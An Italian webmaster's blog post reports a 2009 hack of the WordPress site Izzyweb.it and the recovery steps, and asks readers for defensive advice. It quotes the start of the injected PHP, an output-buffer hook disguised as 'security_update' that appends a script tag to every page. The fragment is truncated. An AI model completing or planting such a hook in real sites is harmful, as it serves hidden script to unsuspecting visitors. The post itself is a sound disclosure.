Ieri 03/11/2009 Izzyweb.it è stato oggetto di un attacco hacker. Purtroppo c’é stato un down di circa 5 ore, conseguente all’inserimento di uno script malevolo in tutte le index del portale. Leggendo fra i vari forum specializzati, sono arrivato alla conclusione che si tratta di un Troyan che ha già colpito decine di siti in diversi periodi: purtroppo non si sa ancora come abbiano fatto a entrare così profondamente nel cms, l’ipotesi più plausibile è un furto di password da un pc, sempre con dei software troyan o malware. Il troyan cerca di reperire informazioni ai visitatori dei siti web, ma almeno questa volta risultava inattivo forse per le protezioni dell’hosting Aruba. Per fortuna è bastato reinstallare il cms WordPress ed è tornato tutto normale. Nè il database nè il tema in uso hanno avuto attacchi. Per sicurezza sono state cambiate tutte le password di accesso al pannello di controllo e ftp. Sotto vi allego l’inizio nel codice malevolo, se avete più informazioni di me, vi prego di informarci su come difenderci al meglio da questi attacchi. Grazie.
php ob_start(“security_update”); function security_update($buffer){return $buffer.”<script language=
Nincheri Fabio Izzyweb.it
